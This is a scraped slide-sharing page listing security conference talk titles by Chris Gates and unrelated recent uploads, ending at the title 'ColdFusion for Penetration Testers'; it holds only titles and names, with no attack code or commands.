Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
Chris Gates
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Chris Gates
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
Chris Gates
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
Chris Gates
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
Chris Gates
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
Chris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Chris Gates
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 

More from Chris Gates (20)

Reiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHVReiki 101 - Defcon29 MHHV
Reiki 101 - Defcon29 MHHV
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018WeirdAAL (Awesome Attack Library) CactusCon 2018
WeirdAAL (Awesome Attack Library) CactusCon 2018
 
WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library) WeirdAAL (AWS Attack Library)
WeirdAAL (AWS Attack Library)
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINEPENETRATION TESTING FROM A HOT TUB TIME MACHINE
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
 
Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)Home Arcade setup (NoVA Hackers)
Home Arcade setup (NoVA Hackers)
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps ToolchainsDevOOPS: Attacks and Defenses for DevOps Toolchains
DevOOPS: Attacks and Defenses for DevOps Toolchains
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
 
Open Canary - novahackers
Open Canary - novahackersOpen Canary - novahackers
Open Canary - novahackers
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone  Sector...
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016DevOops Redux Ken Johnson Chris Gates  - AppSec USA 2016
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
 
Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later Going Purple : From full time breaker to part time fixer: 1 year later
Going Purple : From full time breaker to part time fixer: 1 year later
 
DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015DevOops & How I hacked you DevopsDays DC June 2015
DevOops & How I hacked you DevopsDays DC June 2015
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
 
LasCon 2014 DevOoops
LasCon 2014 DevOoops LasCon 2014 DevOoops
LasCon 2014 DevOoops
 
Appsec DC - wXf -2010
Appsec DC - wXf  -2010Appsec DC - wXf  -2010
Appsec DC - wXf -2010
 
Windows attacks - AT is the new black
Windows attacks - AT is the new blackWindows attacks - AT is the new black
Windows attacks - AT is the new black
 
Top Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions TodayTop Security Challenges Facing Credit Unions Today
Top Security Challenges Facing Credit Unions Today
 
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Def...
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
 

Recently uploaded

5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
DanBrown980551
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
Zilliz
 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
BibashShahi
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
Fwdays
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
Alex Pruden
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Tosin Akinosho
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Pitangent Analytics & Technology Solutions Pvt. Ltd
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
Jason Yip
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
Ivo Velitchkov
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
Antonios Katsarakis
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
Fwdays
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
DianaGray10
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
AstuteBusiness
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Neo4j
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
panagenda
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
Zilliz
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
Jakub Marek
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
Edge AI and Vision Alliance
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
Chart Kalyan
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Precisely
 

Recently uploaded (20)

5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides5th LF Energy Power Grid Model Meet-up Slides
5th LF Energy Power Grid Model Meet-up Slides
 
Programming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup SlidesProgramming Foundation Models with DSPy - Meetup Slides
Programming Foundation Models with DSPy - Meetup Slides
 
Principle of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptxPrinciple of conventional tomography-Bibash Shahi ppt..pptx
Principle of conventional tomography-Bibash Shahi ppt..pptx
 
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk"Frontline Battles with DDoS: Best practices and Lessons Learned",  Igor Ivaniuk
"Frontline Battles with DDoS: Best practices and Lessons Learned", Igor Ivaniuk
 
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
zkStudyClub - LatticeFold: A Lattice-based Folding Scheme and its Application...
 
Monitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdfMonitoring and Managing Anomaly Detection on OpenShift.pdf
Monitoring and Managing Anomaly Detection on OpenShift.pdf
 
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
Crafting Excellence: A Comprehensive Guide to iOS Mobile App Development Serv...
 
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
[OReilly Superstream] Occupy the Space: A grassroots guide to engineering (an...
 
Apps Break Data
Apps Break DataApps Break Data
Apps Break Data
 
Dandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity serverDandelion Hashtable: beyond billion requests per second on a commodity server
Dandelion Hashtable: beyond billion requests per second on a commodity server
 
"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota"Choosing proper type of scaling", Olena Syrota
"Choosing proper type of scaling", Olena Syrota
 
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectorsConnector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
Connector Corner: Seamlessly power UiPath Apps, GenAI with prebuilt connectors
 
Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |Astute Business Solutions | Oracle Cloud Partner |
Astute Business Solutions | Oracle Cloud Partner |
 
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid ResearchHarnessing the Power of NLP and Knowledge Graphs for Opioid Research
Harnessing the Power of NLP and Knowledge Graphs for Opioid Research
 
HCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAUHCL Notes and Domino License Cost Reduction in the World of DLAU
HCL Notes and Domino License Cost Reduction in the World of DLAU
 
Generating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and MilvusGenerating privacy-protected synthetic data using Secludy and Milvus
Generating privacy-protected synthetic data using Secludy and Milvus
 
Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)Main news related to the CCS TSI 2023 (2023/1695)
Main news related to the CCS TSI 2023 (2023/1695)
 
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
“How Axelera AI Uses Digital Compute-in-memory to Deliver Fast and Energy-eff...
 
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdfHow to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
How to Interpret Trends in the Kalyan Rajdhani Mix Chart.pdf
 
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their MainframeDigital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
Digital Banking in the Cloud: How Citizens Bank Unlocked Their Mainframe
 

ColdFusion for Penetration Testers